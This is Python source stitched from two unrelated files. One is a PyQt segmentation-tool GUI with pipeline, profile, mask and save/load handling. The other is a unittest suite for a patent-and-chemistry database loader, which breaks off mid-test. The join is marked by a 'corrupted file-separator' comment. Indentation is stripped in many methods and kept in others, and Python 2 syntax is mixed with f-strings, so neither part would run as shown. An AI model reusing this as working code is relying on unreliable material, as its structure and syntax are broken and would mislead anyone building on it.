self._ch_control2 = channel_control2
self.synchronize_val = False
self.hide_left_panel_chk = QCheckBox("Hide left panel")
self.hide_left_panel_chk.stateChanged.connect(self.hide_left_panel)
self.synchronize_checkbox = QCheckBox("Synchronize view")
self.synchronize_checkbox.stateChanged.connect(synchronize.set_synchronize)
self.interactive_use = QCheckBox("Interactive use")
self.execute_btn = QPushButton("Execute")
self.execute_btn.clicked.connect(self.execute_algorithm)
self.execute_btn.setStyleSheet("QPushButton{font-weight: bold;}")
self.save_pipe_btn = QPushButton("Save pipeline")
self.save_pipe_btn.clicked.connect(self.save_pipeline)
self.save_pipe_btn.setToolTip("Save current pipeline. Last element is last executed algorithm")
self.choose_pipe = QComboBox()
self.choose_pipe.addItem("<none>")
self.choose_pipe.addItems(list(self._settings.segmentation_pipelines.keys()))
self.choose_pipe.currentTextChanged.connect(self.choose_pipeline)
self.choose_pipe.setToolTip("Execute chosen pipeline")
self.save_profile_btn = QPushButton("Save profile")
self.save_profile_btn.setToolTip("Save values from current view")
self.save_profile_btn.clicked.connect(self.save_profile)
self.choose_profile = QComboBox()
self.choose_profile.addItem("<none>")
self.choose_profile.addItems(list(self._settings.segmentation_profiles.keys()))
self.choose_profile.setToolTip("Select profile to restore its settings. Execute if interactive is checked")
# image state
self.compare_btn = QPushButton("Compare")
self.compare_btn.setDisabled(True)
self.compare_btn.clicked.connect(self.compare_action)
left_image.hide_signal.connect(self.compare_btn.setHidden)
self.update_tooltips()
self.choose_profile.currentTextChanged.connect(self.change_profile)
self.interactive_use.stateChanged.connect(self.execute_btn.setDisabled)
self.interactive_use.stateChanged.connect(self.interactive_change)
self.algorithm_choose_widget = AlgorithmChoose(settings, algorithm_description.analysis_algorithm_dict)
self.algorithm_choose_widget.result.connect(self.execution_done)
self.algorithm_choose_widget.finished.connect(self.calculation_finished)
self.algorithm_choose_widget.value_changed.connect(self.interactive_algorithm_execute)
self.algorithm_choose_widget.algorithm_changed.connect(self.interactive_algorithm_execute)
self.label = TextShow()
# self.label.setWordWrap(True)
# self.label.setTextInteractionFlags(Qt.TextSelectableByMouse)
layout = QVBoxLayout()
layout2 = QHBoxLayout()
layout2.setSpacing(1)
layout2.setContentsMargins(0, 0, 0, 0)
layout3 = QHBoxLayout()
layout3.setContentsMargins(0, 0, 0, 0)
layout.setContentsMargins(0, 0, 0, 0)
layout5 = QHBoxLayout()
layout5.setContentsMargins(0, 0, 0, 0)
layout5.addWidget(self.save_pipe_btn)
layout5.addWidget(self.choose_pipe)
layout4 = QHBoxLayout()
layout4.setContentsMargins(0, 0, 0, 0)
layout4.addWidget(self.save_profile_btn)
layout4.addWidget(self.choose_profile)
layout3.addWidget(self.interactive_use)
layout3.addWidget(self.execute_btn)
layout.addLayout(layout5)
layout.addLayout(layout4)
layout.addLayout(layout3)
layout.addWidget(self.algorithm_choose_widget, 1)
# layout.addLayout(self.stack_layout)
layout.addWidget(self.label)
# layout.addStretch(1)
layout2.addWidget(self.hide_left_panel_chk)
layout2.addWidget(self.synchronize_checkbox)
layout.addLayout(layout2)
layout.addWidget(self._ch_control2)
# layout.setSpacing(0)
self.setLayout(layout)
def compare_action(self):
if self.compare_btn.text() == "Compare":
self._settings.set_segmentation_to_compare(self._settings.segmentation_info)
self.compare_btn.setText("Remove")
else:
self._settings.set_segmentation_to_compare(SegmentationInfo(None))
self.compare_btn.setText("Compare")
def calculation_finished(self):
self.execute_btn.setDisabled(self.interactive_use.isChecked())
self.interactive_use.setEnabled(True)
def save_pipeline(self):
history = self._settings.get_history()
if not history:
QMessageBox.information(self, "No mask created", "There is no new mask created", QMessageBox.Ok)
return
mask_history = []
for el in history:
mask = el.mask_property
segmentation = SegmentationProfile(
name="Unknown",
algorithm=el.segmentation_parameters["algorithm_name"],
values=el.segmentation_parameters["values"],
)
new_el = SegmentationPipelineElement(mask_property=mask, segmentation=segmentation)
mask_history.append(new_el)
name = self._settings.last_executed_algorithm
if not name:
QMessageBox.information(self, "No segmentation", "No segmentation executed", QMessageBox.Ok)
return
values = self._settings.get(f"algorithms.{name}", {})
if len(values) == 0:
QMessageBox.information(self, "Some problem", "Pleas run execution again", QMessageBox.Ok)
return
current_segmentation = SegmentationProfile(name="Unknown", algorithm=name, values=values)
while True:
text, ok = QInputDialog.getText(self, "Pipeline name", "Input pipeline name here")
if not ok:
return
if text in self._settings.segmentation_pipelines:
if QMessageBox.No == QMessageBox.warning(
self,
"Already exists",
"Profile with this name already exist. Overwrite?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No,
):
continue
profile = SegmentationPipeline(name=text, segmentation=current_segmentation, mask_history=mask_history)
self._settings.segmentation_pipelines[text] = profile
self._settings.dump()
self.choose_pipe.addItem(text)
break
def choose_pipeline(self, text):
if text == "<none>":
return
pipeline = self._settings.segmentation_pipelines[text]
process_thread = CalculatePipelineThread(self._settings.image, self._settings.mask, pipeline)
dial = WaitingDialog(process_thread)
if dial.exec() and process_thread.result:
pipeline_result = process_thread.result
self._settings.mask = pipeline_result.mask
self._settings.segmentation = pipeline_result.segmentation
self._settings.full_segmentation = pipeline_result.full_segmentation
self._settings.set_history(pipeline_result.history)
self.label.setText(pipeline_result.description)
self.algorithm_choose_widget.change_algorithm(pipeline.segmentation.algorithm, pipeline.segmentation.values)
self.choose_pipe.setCurrentIndex(0)
def update_tooltips(self):
for i in range(1, self.choose_profile.count()):
if self.choose_profile.itemData(i, Qt.ToolTipRole) is not None:
continue
text = self.choose_profile.itemText(i)
profile: SegmentationProfile = self._settings.segmentation_profiles[text]
tool_tip_text = str(profile)
self.choose_profile.setItemData(i, tool_tip_text, Qt.ToolTipRole)
for i in range(1, self.choose_pipe.count()):
if self.choose_pipe.itemData(i, Qt.ToolTipRole) is not None:
continue
text = self.choose_pipe.itemText(i)
profile: SegmentationPipeline = self._settings.segmentation_pipelines[text]
tool_tip_text = str(profile)
self.choose_pipe.setItemData(i, tool_tip_text, Qt.ToolTipRole)
@staticmethod
def update_combo_box(combo_box: QComboBox, dkt: dict):
current_names = set(dkt.keys())
prev_names = {combo_box.itemText(i) for i in range(1, combo_box.count())}
new_names = current_names - prev_names
delete_names = prev_names - current_names
if len(delete_names) > 0:
i = 1
while i < combo_box.count():
if combo_box.itemText(i) in delete_names:
combo_box.removeItem(i)
else:
i += 1
if len(new_names) > 0:
combo_box.addItems(list(sorted(new_names)))
def event(self, event: QEvent):
if event.type() == QEvent.WindowActivate:
# update combobox for segmentation
self.update_combo_box(self.choose_profile, self._settings.segmentation_profiles)
# update combobox for pipeline
self.update_combo_box(self.choose_pipe, self._settings.segmentation_pipelines)
self.update_tooltips()
return super().event(event)
def keyPressEvent(self, event: QKeyEvent):
if (event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return) and (event.modifiers() == Qt.ControlModifier):
self.execute_btn.click()
def save_profile(self):
widget: InteractiveAlgorithmSettingsWidget = self.algorithm_choose_widget.current_widget()
while True:
text, ok = QInputDialog.getText(self, "Profile Name", "Input profile name here")
if not ok:
return
if text in self._settings.segmentation_profiles:
if QMessageBox.No == QMessageBox.warning(
self,
"Already exists",
"Profile with this name already exist. Overwrite?",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No,
):
continue
resp = SegmentationProfile(text, widget.name, widget.get_values())
self._settings.segmentation_profiles[text] = resp
self._settings.dump()
self.choose_profile.addItem(text)
self.update_tooltips()
break
def change_profile(self, val):
self.choose_profile.setToolTip("")
if val == "<none>":
return
interactive = self.interactive_use.isChecked()
self.interactive_use.setChecked(False)
profile = self._settings.segmentation_profiles[val]
self.algorithm_choose_widget.change_algorithm(profile.algorithm, profile.values)
self.choose_profile.blockSignals(True)
self.choose_profile.setCurrentIndex(0)
self.choose_profile.blockSignals(False)
self.interactive_use.setChecked(interactive)
@property
def segmentation(self):
return self._settings.segmentation
@property
def interactive(self):
return self.interactive_use.isChecked()
def hide_left_panel(self, val):
self._settings.set_in_profile("hide_left_panel", val)
if val:
self.synchronize_val = self.synchronize_checkbox.isChecked()
self.synchronize_checkbox.setChecked(False)
else:
self.synchronize_checkbox.setChecked(self.synchronize_val)
self.synchronize_checkbox.setDisabled(val)
self.left_panel.parent().setHidden(val)
    def interactive_change(self, val):
        """Run the algorithm immediately when interactive mode is switched on."""
        if val:
            self.execute_algorithm()
    def algorithm_change(self, val):
        """Persist the newly selected algorithm and re-run it in interactive mode."""
        self._settings.set("current_algorithm", val)
        if self.interactive:
            self.execute_algorithm()
    def interactive_algorithm_execute(self):
        """Re-run the algorithm on parameter change, but only in interactive mode."""
        if self.interactive:
            self.execute_algorithm()
    def execute_algorithm(self):
        """Validate data compatibility with the chosen algorithm and launch it."""
        widget: InteractiveAlgorithmSettingsWidget = self.algorithm_choose_widget.current_widget()
        if self._settings.image.is_time and not widget.algorithm.support_time():
            QMessageBox.information(
                self, "Not supported", "This algorithm do not support time data. " "You can convert it in image adjust"
            )
            return
        if self._settings.image.is_stack and not widget.algorithm.support_z():
            QMessageBox.information(
                self, "Not supported", "This algorithm do not support stack data. " "You can convert it in image adjust"
            )
            return
        self._settings.last_executed_algorithm = widget.name
        # disable controls while the algorithm runs.
        # NOTE(review): re-enabling is not visible in this block — confirm it
        # happens when execution finishes (e.g. via a signal from the widget).
        self.execute_btn.setDisabled(True)
        self.interactive_use.setDisabled(True)
        widget.execute()
    def execution_done(self, segmentation: SegmentationResult):
        """Consume an algorithm result: store segmentation, extra layers and info text."""
        if segmentation.info_text != "":
            QMessageBox.information(self, "Algorithm info", segmentation.info_text)
        self._settings.segmentation = segmentation.segmentation
        # comparison only makes sense for a non-empty segmentation array
        self.compare_btn.setEnabled(
            isinstance(segmentation.segmentation, np.ndarray) and np.any(segmentation.segmentation)
        )
        self._settings.additional_layers = segmentation.additional_layers
        self.label.setText(self.sender().get_info_text())
    def showEvent(self, _event):
        """Restore the persisted left-panel visibility when the widget is shown."""
        self.hide_left_panel_chk.setChecked(self._settings.get_from_profile("hide_left_panel", False))
class MainMenu(BaseMainMenu):
    """Top button bar: open/save, settings, mask manager and batch processing."""

    def __init__(self, settings: PartSettings, main_window):
        super().__init__(settings, main_window)
        self.settings = settings
        self.open_btn = QPushButton("Open")
        self.save_btn = QPushButton("Save")
        self.advanced_btn = QPushButton("Settings and Measurement")
        self.mask_manager_btn = QPushButton("Mask manager")
        self.batch_processing_btn = QPushButton("Batch Processing")
        layout = QHBoxLayout()
        # layout.setSpacing(0)
        layout.setContentsMargins(0, 0, 4, 4)
        layout.addWidget(self.open_btn)
        layout.addWidget(self.save_btn)
        layout.addWidget(self.advanced_btn)
        layout.addWidget(self.mask_manager_btn)
        layout.addWidget(self.batch_processing_btn)
        self.setLayout(layout)
        self.open_btn.clicked.connect(self.load_data)
        self.save_btn.clicked.connect(self.save_file)
        self.advanced_btn.clicked.connect(self.advanced_window_show)
        self.mask_manager_btn.clicked.connect(self.mask_manager)
        self.batch_processing_btn.clicked.connect(self.batch_window)
        self.setFocusPolicy(Qt.StrongFocus)
        # self.test_btn.clicked.connect(self.test_fun)

    def resizeEvent(self, event: QResizeEvent):
        # hide the least essential button on narrow windows
        if event.size().width() < 800:
            self.batch_processing_btn.hide()
        else:
            self.batch_processing_btn.show()

    def keyPressEvent(self, event: QKeyEvent):
        """Handle the standard Save/Open shortcuts; other keys go to the base class."""
        if event.matches(QKeySequence.Save):
            self.save_file()
        elif event.matches(QKeySequence.Open):
            self.load_data()
        super().keyPressEvent(event)

    def save_file(self):
        """Show the save dialog, persist dialog state, and run the save in a worker dialog."""
        base_values = self.settings.get("save_parameters", dict())
        dial = SaveDialog(
            save_dict, system_widget=False, base_values=base_values, history=self.settings.get_path_history()
        )
        # preselect the current image's base name and last-used directory/filter
        dial.selectFile(os.path.splitext(os.path.basename(self.settings.image_path))[0])
        dial.setDirectory(
            self.settings.get("io.save_directory", self.settings.get("io.open_directory", str(Path.home())))
        )
        dial.selectNameFilter(self.settings.get("io.save_filter", ""))
        if dial.exec():
            save_location, selected_filter, save_class, values = dial.get_result()
            project_info = self.settings.get_project_info()
            self.settings.set("io.save_filter", selected_filter)
            save_dir = os.path.dirname(save_location)
            self.settings.set("io.save_directory", save_dir)
            self.settings.add_path_history(save_dir)
            base_values[selected_filter] = values

            def exception_hook(exception):
                # called off the GUI thread; warnings are marshalled to the GUI
                # thread via a queued invocation of QApplication.show_warning
                from qtpy.QtCore import QMetaObject
                from qtpy.QtWidgets import QApplication

                instance = QApplication.instance()
                if isinstance(exception, ValueError):
                    instance.warning = "Save error", f"Error during saving\n{exception}"
                    QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
                else:
                    # unknown failure: re-raise so it is not silently swallowed
                    raise exception

            dial2 = ExecuteFunctionDialog(
                save_class.save, [save_location, project_info, values], exception_hook=exception_hook
            )
            dial2.exec()

    def mask_manager(self):
        """Open the mask manager dialog; requires an existing segmentation."""
        if self.settings.segmentation is None:
            QMessageBox.information(self, "No segmentation", "Cannot create mask without segmentation")
            return
        dial = MaskDialog(self.settings)
        dial.exec_()

    def load_data(self):
        """Show the load dialog, run the loader in a worker dialog, and install the result."""

        def exception_hook(exception):
            # called off the GUI thread; map known failure modes to user-facing
            # warnings shown on the GUI thread, re-raise anything unexpected
            from qtpy.QtCore import QMetaObject
            from qtpy.QtWidgets import QApplication

            instance = QApplication.instance()
            if isinstance(exception, ValueError) and exception.args[0] == "Incompatible shape of mask and image":
                instance.warning = (
                    "Open error",
                    "Most probably you try to load mask from other image. " "Check selected files",
                )
                QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
            elif isinstance(exception, MemoryError):
                instance.warning = "Open error", f"Not enough memory to read this image: {exception}"
                QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
            elif isinstance(exception, IOError):
                instance.warning = "Open error", f"Some problem with reading from disc: {exception}"
                QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
            elif isinstance(exception, KeyError):
                instance.warning = "Open error", f"Some problem project file: {exception}"
                QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
                # also log the raw KeyError for debugging
                print(exception, file=sys.stderr)
            elif isinstance(exception, WrongFileTypeException):
                instance.warning = (
                    "Open error",
                    "No needed files inside archive. Most probably you choose file from segmentation mask",
                )
                QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
            else:
                raise exception

        try:
            dial = CustomLoadDialog(load_functions.load_dict, history=self.settings.get_path_history())
            dial.setDirectory(self.settings.get("io.open_directory", str(Path.home())))
            dial.selectNameFilter(self.settings.get("io.open_filter", next(iter(load_functions.load_dict.keys()))))
            if dial.exec_():
                result = dial.get_result()
                self.settings.set("io.open_filter", result.selected_filter)
                load_dir = os.path.dirname(result.load_location[0])
                self.settings.set("io.open_directory", load_dir)
                self.settings.add_path_history(load_dir)
                dial2 = ExecuteFunctionDialog(
                    result.load_class.load,
                    [result.load_location],
                    {"metadata": {"default_spacing": self.settings.image_spacing}},
                    exception_hook=exception_hook,
                )
                if dial2.exec():
                    result = dial2.get_result()
                    self.set_data(result)
        except ValueError as e:
            QMessageBox.warning(self, "Open error", "{}".format(e))

    def batch_window(self):
        """Show (or raise) the batch-processing window, creating it on first use."""
        if self.main_window.batch_window is not None:
            if self.main_window.batch_window.isVisible():
                self.main_window.batch_window.activateWindow()
            else:
                self.main_window.batch_window.show()
        else:
            self.main_window.batch_window = BatchWindow(self.settings)
            self.main_window.batch_window.show()

    def advanced_window_show(self):
        """Show (or raise) the settings/measurement window."""
        if self.main_window.advanced_window.isVisible():
            self.main_window.advanced_window.activateWindow()
        else:
            self.main_window.advanced_window.show()
class MaskDialog(MaskDialogBase):
    """Dialog that builds the next mask from the current project and mask settings."""

    def next_mask(self):
        """Compute a mask from the current project, record history, and close."""
        project_info: ProjectTuple = self.settings.get_project_info()
        mask_property = self.mask_widget.get_mask_property()
        self.settings.set("mask_manager.mask_property", mask_property)
        mask = calculate_mask_from_project(mask_description=mask_property, project=project_info)
        self.settings.add_history_element(create_history_element_from_project(project_info, mask_property,))
        # if a redo step exists, restore its algorithm name and parameter values
        if self.settings.history_redo_size():
            history: HistoryElement = self.settings.history_next_element()
            self.settings.set("current_algorithm", history.segmentation_parameters["algorithm_name"])
            self.settings.set(
                f"algorithm.{history.segmentation_parameters['algorithm_name']}",
                history.segmentation_parameters["values"],
            )
        self.settings.mask = mask
        self.close()
# | |  (corrupted file-separator artifact; commented out so it does not break parsing)
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import unittest
from datetime import date
from sqlalchemy import create_engine, select, and_
from src.scripts.data_loader import DataLoader, DocumentClass, DocumentField
logging.basicConfig( format='%(asctime)s %(levelname)s %(name)s %(message)s', level=logging.INFO)
class DataLoaderTests(unittest.TestCase):
###### Preparation / bootstrapping ######
    def setUp(self):
        """Create an in-memory SQLite DB and the DataLoader under test, then build the schema."""
        self.db = create_engine('sqlite:///:memory:', echo=False)
        self.test_classifications = ("TEST_CLASS1","TEST_CLASS2","TEST_CLASS3","TEST_CLASS4", "TEST_CLASS7")
        # Create the object under test, use it to create the schema
        self.loader = DataLoader( self.db, self.test_classifications )
        self.metadata = self.loader.db_metadata()
        self.metadata.create_all(self.db)
def test_create_doc_loader(self):
self.failUnless( isinstance(self.loader, DataLoader) )
###### Biblio loading tests ######
def test_write_document_record(self):
result = self.load_n_query('data/biblio_single_row.json')
row = result.fetchone()
self.check_doc_row(row, (1,'WO-2013127697-A1',date(2013,9,6),0,47747634))
def test_write_docs_many(self):
result = self.load_n_query('data/biblio_typical.json')
rows = result.fetchall()
self.failUnlessEqual( 25, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
self.check_doc_row( rows[1], (2,'WO-2013127698-A1',date(2013,9,6),0,47748611) )
self.check_doc_row( rows[24], (25,'WO-2013189394-A2',date(2013,12,27),0,49769540) )
def test_write_docs_duplicates_handled(self):
self.load(['data/biblio_single_row.json'])
self.load(['data/biblio_typical.json'])
rows = self.query_all(['schembl_document']).fetchall()
self.failUnlessEqual( 25, len( rows ) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
def test_unexpected_disallowed_duplicate(self):
try:
self.load(['data/biblio_single_row.json'])
DataLoader( self.db, self.test_classifications, allow_doc_dups=False ).load_biblio('data/biblio_typical.json')
self.fail("Exception was expected")
except RuntimeError,exc:
self.failUnlessEqual("An Integrity error was detected when inserting document WO-2013127697-A1. This indicates "\
"insertion of an existing document, but duplicates have been disallowed", exc.message)
def test_sequence_definitions(self):
mdata = self.loader.db_metadata()
self.failUnlessEqual( 'schembl_document_id', mdata.tables['schembl_document'].c.id.default.name )
    def test_titles(self):
        """All 62 title rows load with correct doc id, language code and (unicode) text."""
        result = self.load_n_query('data/biblio_typical.json', ['schembl_document_title'])
        rows = result.fetchall()
        self.failUnlessEqual( 62, len(rows) )
        # Row ordering is based on dictionary; may be brittle
        self.check_title_row( rows[0], (1, "FR", u"UTILISATION D'UN FILM ADHÉSIF À RÉACTIVITÉ LATENTE POUR LE COLLAGE DE PLASTIQUE SUR DE L'ALUMINIUM ANODISÉ") )
        self.check_title_row( rows[1], (1, "DE", u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF") )
        self.check_title_row( rows[2], (1, "EN", u"USE OF A LATENTLY REACTIVE ADHESIVE FILM FOR ADHESIVE BONDING OF ELOXATED ALUMINIUM TO PLASTIC") )
        self.check_title_row( rows[56], (24,"FR", u"PROCÉDÉ DE PILOTAGE DE MISE EN FORME DE TRAFIC ET ORGANE PILOTAGE") )
        self.check_title_row( rows[57], (24,"EN", u"TRAFFIC SHAPING DRIVE METHOD AND DRIVER") )
        self.check_title_row( rows[58], (24,"ZH", u"一种流量整形的驱动方法及驱动器") )
        self.check_title_row( rows[59], (25,"FR", u"PROCÉDÉ, SYSTÈME ET DISPOSITIF D'ACQUISITION D'INFORMATIONS SUR LES RESSOURCES, POUR DISPOSITIF TERMINAL DE L'INTERNET DES OBJETS") )
        self.check_title_row( rows[60], (25,"EN", u"RESOURCE INFORMATION ACQUISITION METHOD, SYSTEM AND DEVICE FOR INTERNET OF THINGS TERMINAL DEVICE") )
        self.check_title_row( rows[61], (25,"ZH", u"一种物联网终端设备的资源信息获取方法、系统及设备") )
    def test_titles_duplicate(self):
        """Duplicate titles are collapsed; only distinct (doc, lang, text) rows remain."""
        rows = self.load_n_query('data/biblio_dup_titles.json', ['schembl_document_title']).fetchall()
        self.failUnlessEqual( 4, len(rows) )
        self.check_title_row( rows[0], (1, "FR", u"UTILISATION D'UN FILM ADHÉSIF À RÉACTIVITÉ LATENTE POUR LE COLLAGE DE PLASTIQUE SUR DE L'ALUMINIUM ANODISÉ") )
        self.check_title_row( rows[1], (1, "DE", u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF") )
        self.check_title_row( rows[2], (1, "EN", u"USE OF A LATENTLY REACTIVE ADHESIVE FILM FOR ADHESIVE BONDING") )
        self.check_title_row( rows[3], (2, "DE", u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF") )
def test_classifications_simple(self):
result = self.load_n_query('data/biblio_single_row.json', ['schembl_document_class'])
rows = result.fetchall()
self.check_class_row( rows[0], (1, "B29C", DocumentClass.IPC) )
    def test_classifications_all(self):
        """Each classification system (IPC/ECLA/IPCR/CPC) loads fully, partially or empty."""
        self.load_n_query('data/biblio_typical.json')
        # Check a document with all classifications
        self.verify_classes( 1, DocumentClass.IPC, ["B29C"])
        self.verify_classes( 1, DocumentClass.ECLA, ["B29C"])
        self.verify_classes( 1, DocumentClass.IPCR, ["B29C 65/50","B32B 37/12","B32B 7/12","C08K 5/29","C08K 5/32","C09J 7/00","C09J 7/02","C09J 7/04"])
        self.verify_classes( 1, DocumentClass.CPC, ["B29C 65/4835","B29C 65/5057","B29C 66/7422","B32B 2038/042","B32B 2309/02","B32B 2309/04","B32B 2309/12","B32B 2457/00","B32B 37/0046","B32B 37/1207","B32B 38/1841","B32B 7/12","C08J 5/12","C09J 2205/102","C09J 2475/00","C09J 5/00","C09J 7/00","C09J 7/0203","C09J 7/043"])
        # Check documents with none / some
        self.verify_classes( 2, DocumentClass.IPC, [])
        self.verify_classes( 2, DocumentClass.ECLA, [])
        self.verify_classes( 2, DocumentClass.IPCR, [])
        self.verify_classes( 2, DocumentClass.CPC, [])
        self.verify_classes( 25, DocumentClass.IPC, [])
        self.verify_classes( 25, DocumentClass.ECLA, [])
        self.verify_classes( 25, DocumentClass.IPCR, ["H04L 29/08"])
        self.verify_classes( 25, DocumentClass.CPC, ["H04L 29/08"])
    def test_classes_define_life_sci_flag(self):
        """The life_sci_relevant flag is set iff a relevant classification is present."""
        # Checks that classifications determine the life_sci_relevant flag, when:
        # - relevant classes present in ipc/ipcr/ecla/cpc fields (sole value)
        # - relevant class appears as a prefix
        # - mixed in with other/similar codes (before / after)
        result = self.load_n_query('data/biblio_typical.json')
        rows = result.fetchall()
        relevant = set(['WO-2013127700-A1','WO-2013127701-A2','WO-2013127702-A1','WO-2013127703-A1','WO-2013127704-A1',
                        'WO-2013127705-A1','WO-2013127707-A1','WO-2013127708-A1','WO-2013127712-A1','WO-2013127714-A1'])
        for row in rows:
            expect_relevant = row['scpn'] in relevant
            self.failUnlessEqual(int(expect_relevant), row['life_sci_relevant'])
    def test_classifications_set(self):
        """Default relevant classes are used when none given; overrides are honoured."""
        default_classes = set(["A01", "A23", "A24", "A61", "A62B","C05", "C06", "C07", "C08", "C09", "C10", "C11", "C12", "C13", "C14","G01N"])
        local_loader = DataLoader(self.db)
        self.failUnlessEqual( default_classes, local_loader.relevant_classifications() )
        self.failUnlessEqual( self.test_classifications, self.loader.relevant_classifications() )
def test_missing_data_handled(self):
rows = self.load_n_query('data/biblio_missing_data.json').fetchall()
self.failUnlessEqual( 3, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
self.check_doc_row( rows[1], (2,'WO-2013127698-A1',date(2013,9,6),0,47748611) )
self.check_doc_row( rows[2], (3,'WO-2013189394-A2',date(2013,12,27),0,49769540) )
def test_missing_mandatory_data(self):
self.expect_runtime_error('data/biblio_missing_scpn.json', "Document is missing mandatory biblio field (KeyError: 'pubnumber')")
self.expect_runtime_error('data/biblio_missing_pubdate.json', "Document is missing mandatory biblio field (KeyError: 'pubdate')")
self.expect_runtime_error('data/biblio_missing_familyid.json', "Document is missing mandatory biblio field (KeyError: 'family_id')")
self.expect_runtime_error('data/biblio_empty_scpn.json', "Document publication number field is empty")
def test_disable_titles(self):
simple_loader = DataLoader( self.db, self.test_classifications, load_titles=False )
simple_loader.load_biblio( 'data/biblio_typical.json' )
rows = self.query_all(['schembl_document_title']).fetchall()
self.failUnlessEqual(0, len(rows))
def test_disable_classifications(self):
simple_loader = DataLoader( self.db, self.test_classifications, load_classifications=False )
simple_loader.load_biblio( 'data/biblio_typical.json' )
rows = self.query_all(['schembl_document_class']).fetchall()
self.failUnlessEqual(0, len(rows))
def test_replace_document(self):
simple_loader = DataLoader( self.db, self.test_classifications, overwrite=True )
simple_loader.load_biblio( 'data/biblio_typical.json' )
rows = self.query_all(['schembl_document']).fetchall()
self.failUnlessEqual( 25, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
self.check_doc_row( rows[18], (19,'WO-2013189302-A1',date(2013,12,27),0,49768126) )
simple_loader.load_biblio( 'data/biblio_typical_update.json' )
rows = self.query_all(['schembl_document']).fetchall()
self.failUnlessEqual( 25, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,5),0,47474747) )
self.check_doc_row( rows[18], (19,'WO-2013189302-A1',date(2013,12,31),1,47474748) ) # This record is now life-sci-relevant
    def test_replace_titles(self):
        """In overwrite mode a reload replaces the title set for a document."""
        # Covers deletion of obsolete titles, insertion of new titles, and modification of existing records
        updating_loader = DataLoader( self.db, self.test_classifications, overwrite=True )
        updating_loader.load_biblio( 'data/biblio_typical.json' )
        self.verify_titles( 1, {'DE':u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF",
                                'FR':u"UTILISATION D'UN FILM ADHÉSIF À RÉACTIVITÉ LATENTE POUR LE COLLAGE DE PLASTIQUE SUR DE L'ALUMINIUM ANODISÉ",
                                'EN':u"USE OF A LATENTLY REACTIVE ADHESIVE FILM FOR ADHESIVE BONDING OF ELOXATED ALUMINIUM TO PLASTIC" } )
        updating_loader.load_biblio( 'data/biblio_typical_update.json' )
        self.verify_titles( 1, {'DE':u"Dis ist der neu titlen",
                                'ZH':u"寻设备息的传消呼方法和输" } )
    def test_replace_classes(self):
        """In overwrite mode a reload replaces the classification set for a document."""
        # Covers deletion of obsolete classes, insertion of new classes, and modification of existing records
        updating_loader = DataLoader( self.db, self.test_classifications, overwrite=True )
        updating_loader.load_biblio( 'data/biblio_typical.json' )
        self.verify_classes( 19, DocumentClass.IPC, [])
        self.verify_classes( 19, DocumentClass.ECLA, [])
        self.verify_classes( 19, DocumentClass.IPCR, ["H04W 68/02"])
        self.verify_classes( 19, DocumentClass.CPC, ["H04W 68/005"])
        updating_loader.load_biblio( 'data/biblio_typical_update.json' )
        self.verify_classes( 19, DocumentClass.IPC, ["TEST_CLASS1"]) # Doc now has one IPC class (insertion - life sci relevant)
        self.verify_classes( 19, DocumentClass.ECLA, ["H04W 76/02"]) # Doc now has one ECLA class (insertion)
        self.verify_classes( 19, DocumentClass.IPCR, ["B32B 37/12","H04W 68/02"]) # Doc now has one extra IPCR (1 unchanged, 1 insert)
        self.verify_classes( 19, DocumentClass.CPC, []) # Doc now has zero CPC classes (deletion)
###### Chem loading tests ######
def test_write_chem_record(self):
self.load(['data/biblio_single_row.json','data/chem_single_row.tsv'])
row = self.query_all(['schembl_chemical']).fetchone()
self.check_chem_row( row, (9724,960.805,86708,1,0,1.135,4,20,6,9) )
    def test_write_chem_text(self):
        """The structure row carries the SMILES, InChI and InChIKey text fields."""
        self.load(['data/biblio_single_row.json','data/chem_single_row.tsv'])
        row = self.query_all(['schembl_chemical_structure']).fetchone()
        self.check_struct_row( row,
            (9724, "[Na+].[Na+].[Na+].[Na+].CC1=CC(=CC=C1\N=N\C1=C(O)C2=C(N)C=C(C=C2C=C1S([O-])(=O)=O)S([O-])(=O)=O)C1=CC(C)=C(C=C1)\N=N\C1=C(O)C2=C(N)C=C(C=C2C=C1S([O-])(=O)=O)S([O-])(=O)=O",
            "InChI=1S/C34H28N6O14S4.4Na/c1-15-7-17(3-5-25(15)37-39-31-27(57(49,50)51)11-19-9-21(55(43,44)45)13-23(35)29(19)33(31)41)18-4-6-26(16(2)8-18)38-40-32-28(58(52,53)54)12-20-10-22(56(46,47)48)14-24(36)30(20)34(32)42;;;;/h3-14,41-42H,35-36H2,1-2H3,(H,43,44,45)(H,46,47,48)(H,49,50,51)(H,52,53,54);;;;/q;4*+1/p-4/b39-37+,40-38+;;;;",
            "GLNADSQYFUSGOU-GPTZEZBUSA-J"))
    def test_typical_chemfile(self):
        """A typical chemistry file loads structures with dedup, negation and chunking."""
        # Load chemical data, and check:
        # 1) Many structures loaded, 2) duplicates handled, 3) Various values (negation etc) 4) chunking
        # Rows are assumed to be in insertion order, matching input file
        self.load( ['data/biblio_typical.json','data/chem_typical.tsv'], chunk_parm=7 )
